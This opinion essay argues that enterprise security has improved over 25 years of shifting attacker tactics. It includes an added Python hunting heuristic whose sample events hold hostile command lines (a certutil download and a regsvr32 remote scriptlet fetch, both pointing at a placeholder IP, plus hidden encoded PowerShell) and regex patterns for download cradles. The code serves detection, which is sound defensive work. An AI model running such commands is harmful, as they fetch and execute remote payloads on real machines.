2017 has been a tough year from a cybersecurity standpoint. We’ve seen some of the biggest hacks and data breaches ever, as well as one of the most devastating ransomware/malware outbreaks on record.
Despite all of this, I’m going to make a statement that will shock many in the industry: cybersecurity is getting better, not worse. Why is this so shocking? Primarily because we’ve become too reliant on headlines and vendor marketing to tell us where we are as an industry. We’ve become beholden to our own fear, uncertainty and doubt, which basically says that cybersecurity has never been worse.
It’s true that today’s attackers have access to a much wider array of capabilities than was available in the past. Techniques and malware once limited to nation-states have become available to the most resourceful attackers. However, more capability in the hands of attackers does not by itself reflect the general trend of enterprise security as a whole. In fact, the opposite is true.
In contrast to most vendor marketing messages, startup investment decks, and even industry reports, both the security industry (vendors) and security practitioners (defenders on the front lines in the enterprise) have considerably advanced and demonstrably improved at repelling, discovering, and remediating threats.
Don’t Believe Your Lying Eyes – Security is Getting Better
In a world of Equifax, Deloitte, WannaCry, Uber and more, how can this possibly be true? Haven’t more records been breached than ever before? What about nation-state attacks?
If you go by headlines, you’re likely to disagree that security is better. Here’s the problem: security isn’t about headlines. Headlines can be more reflective of reporting requirements (a breach that must be disclosed by law makes the news whether or not it was a large or sophisticated attack) than of the actual state of enterprise security.
Our reality is that sensationalism sells, so media, vendors and analysts try to out-scoop each other, disclosing the next big vulnerability or hack. In some cases, vendors and reporters make news where it doesn’t exist (like when a single infected laptop was reported as the Russians hacking utilities).
Granted, there are many more attackers out there and there are orders of magnitude more things to attack (hello, IoT), but when you consider how the attackers’ modus operandi has evolved over the past 25 years, you can see just how far we’ve come:
- In the early to mid-90’s, attackers had a field day on Unix daemons. Everything was fair game, and daemons from DNS and FTP servers to time services (anyone remember analyzing port 13 traffic?) were not only rife with vulnerabilities, but were exposed to the outside world and therefore common exploitation vectors for gaining footholds in enterprises.
- As firewalls became more widely deployed, access to many of those services was considerably restricted. However, access to web servers was still wide open in those first-generation firewalls and servers were being deployed rapidly as enterprises established a presence on the web. Therefore, as web servers became more lucrative targets, attackers shifted focus to them.
- As organizations’ audit processes matured and the simpler vulnerabilities in the servers themselves were patched, attacker focus shifted again, this time to the third-party and custom-developed applications running on those web servers. This shift to exploiting web applications spurred the first generation of web application firewalls and application audit software, and more broadly promoted secure coding practices.
- As time went on, servers and their exposed web applications slowly became more difficult to target on a broad scale, and a major shift in focus occurred again, this time targeting clients as opposed to servers. It was during this time that Windows became the focal point of attackers’ efforts, and worms and exploits for client operating systems ran rampant. This was possibly the time when security in the enterprise was at its worst; it has been gradually improving since then. One major contributing factor for this improvement was Microsoft’s introduction of Patch Tuesday, which dramatically shortened the useful life of discovered vulnerabilities in the most widely deployed OS on the planet and prompted other vendors to introduce automated patching as well.
- At this point, the cat was out of the bag and attackers had a taste of both the plenitude and the value of clients as opposed to servers. As the OS itself became more difficult to exploit, the shift to third-party applications on the client occurred, repeating the cycle that had previously played out on servers. Eventually the effectiveness of targeting browser plugins (think Java, Flash et al.) was broadly understood, ushering in the era of exploit kits, an era we’re only seeing the tail end of a decade later.
- It’s here the industry stalled for some time, as fighting the plenitude of vulnerabilities in considerably old codebases across the plenitude of third-party plugins took quite a while. This faltering in the history of security was one of several contributing factors that allowed a new renaissance in malware and backdoor development to unfold.
- This led to a broad shift to non-malware-based compromises, often called “living off the land.” In these compromises, attackers use the standard system tools and subsystems that system administrators use every day (PowerShell, WMI, scheduled tasks, remote administration utilities), making it far more difficult for defenders to distinguish between legitimate and illegitimate usage, since the binary itself is signed and expected. We are currently seeing the industry response to this trend, as evidenced by the number of vendor papers and presentations focusing on these behaviors and the rise of the term “hunting” applied to general processes as opposed to a specific practice.
- Today, improvements in securing infrastructure have driven a wider shift towards “smash and grab” style attacks. In the mid-2000s, we saw these types of attacks mostly in sophisticated, nation-state espionage cases. However, the window between initial compromise and discovery has shrunk dramatically, forcing attackers to monetize an intrusion almost immediately. We’re currently in the midst of this, as evidenced by the proliferation of ransomware.
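The “living off the land” bullet above is the one point in this history where the defender’s problem is a classification problem rather than a patching problem: the same `powershell.exe` or `wmic.exe` invocation is routine from an administrator and hostile from a user whose Word document just spawned it. The following is an added example (not code from the original post) of the kind of hunting heuristic that problem calls for. It scores constructed process-creation events, loosely modelled on Sysmon Event ID 1 fields, by combining argument patterns (encoded commands, download cradles, remote scriptlets) with context (parent process, whether the user is expected to run admin tooling). The hosts, users, weights, patterns, admin list and the 203.0.113.0/24 addresses are all assumptions chosen for illustration, not a vendor’s detection content.

```python
"""Hunting heuristic for 'living off the land' process activity.

Added example, not code from the original post. The events below are
constructed sample records, loosely modelled on Sysmon Event ID 1 fields,
and the scoring weights, patterns and admin-user list are assumptions
chosen for illustration rather than a vendor's detection content.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


# Constructed sample events. Hosts, users and the 203.0.113.0/24 address
# (RFC 5737 documentation range) are placeholders.
EVENTS = [
    # Admin running a maintenance script from an interactive shell.
    ProcEvent("SRV01", "jdoe", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\patch.ps1"),
    # Admin using wmic to push a policy refresh to a workstation.
    ProcEvent("SRV01", "jdoe", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\wbem\wmic.exe",
              r'wmic /node:WS07 process call create "cmd /c gpupdate /force"'),
    # Word document spawning hidden, encoded PowerShell under a regular user.
    ProcEvent("WS07", "asmith", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    # certutil abused as a downloader by a regular user.
    ProcEvent("WS07", "asmith", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\certutil.exe",
              "certutil.exe -urlcache -split -f http://203.0.113.5/update.exe update.exe"),
    # regsvr32 fetching a remote scriptlet: suspicious regardless of who runs it.
    ProcEvent("SRV01", "jdoe", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\regsvr32.exe",
              "regsvr32.exe /s /u /i:https://203.0.113.5/x.sct scrobj.dll"),
]

ADMIN_USERS = {"jdoe"}  # assumption: accounts expected to run admin tooling
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# (pattern over the command line, weight, reason). The tools themselves are
# legitimate; the arguments are what separate abuse from administration.
SUSPICIOUS_ARGS = [
    (re.compile(r"powershell.*\s-e(nc|ncodedcommand)?\s", re.I), 4, "encoded PowerShell"),
    (re.compile(r"downloadstring|net\.webclient|invoke-expression|\biex\b", re.I), 4, "download cradle"),
    (re.compile(r"certutil.*-urlcache", re.I), 4, "certutil used as downloader"),
    (re.compile(r"regsvr32.*[/-]i:https?://", re.I), 5, "regsvr32 remote scriptlet"),
    (re.compile(r"wmic.*process\s+call\s+create", re.I), 3, "wmic process creation"),
    (re.compile(r"rundll32.*javascript:", re.I), 5, "rundll32 javascript"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), 2, "hidden window"),
]


def score_event(ev: ProcEvent, admin_users: set[str]) -> tuple[int, list[str]]:
    """Return (score, reasons) combining argument patterns with context."""
    score, reasons = 0, []
    for pattern, weight, reason in SUSPICIOUS_ARGS:
        if pattern.search(ev.command_line):
            score += weight
            reasons.append(reason)
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    if parent in OFFICE_PARENTS:
        score += 5
        reasons.append(f"spawned by {parent}")
    # Context: the same command line is more suspicious from a non-admin account.
    if score and ev.user.lower() not in admin_users:
        score += 2
        reasons.append("run by non-admin user")
    return score, reasons


def hunt(events, admin_users, threshold=5):
    """Return [(event, score, reasons)] for events at or above the threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev, admin_users)
        if score >= threshold:
            hits.append((ev, score, reasons))
    return hits


if __name__ == "__main__":
    for ev, score, reasons in hunt(EVENTS, ADMIN_USERS):
        image = ev.image.rsplit("\\", 1)[-1]
        print(f"{ev.host} {ev.user} {image} score={score}: {', '.join(reasons)}")
```

Run as a script, it flags three of the five constructed events: the Office-spawned encoded PowerShell, the certutil download, and the regsvr32 scriptlet. The two administrator events (a signed maintenance script and a wmic policy push) stay below the threshold even though they use the same binaries, which is the point: a hunting rule over living-off-the-land activity has to weigh who ran what from where, not just which executable appeared.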
When viewed over time, you can see how our industry has progressed and how we continually get better. In the last decade, there has been a fundamental shift that has driven our growth. It was during this period that we saw the emergence of the Security Operations Center (SOC), business processes supporting disciplined and rapid triage, and continual security program improvement driven by auditing and a greater understanding of each breach.
So, what’s the point of the history lesson? Understanding these patterns, as opposed to sensationalizing each attack, gives a model for understanding where we are today in cybersecurity, and where we’re heading.
It allows us to do this without the overwhelming sense of panic that often accompanies each subsequent story about a company being breached. Without FUD, we can rationally predict the evolution of the threat landscape and better identify the solutions to protect against the next wave of attacks. So forget what your lying eyes tell you. From both an industry/vendor standpoint down to the security analyst on the front lines – security is getting better.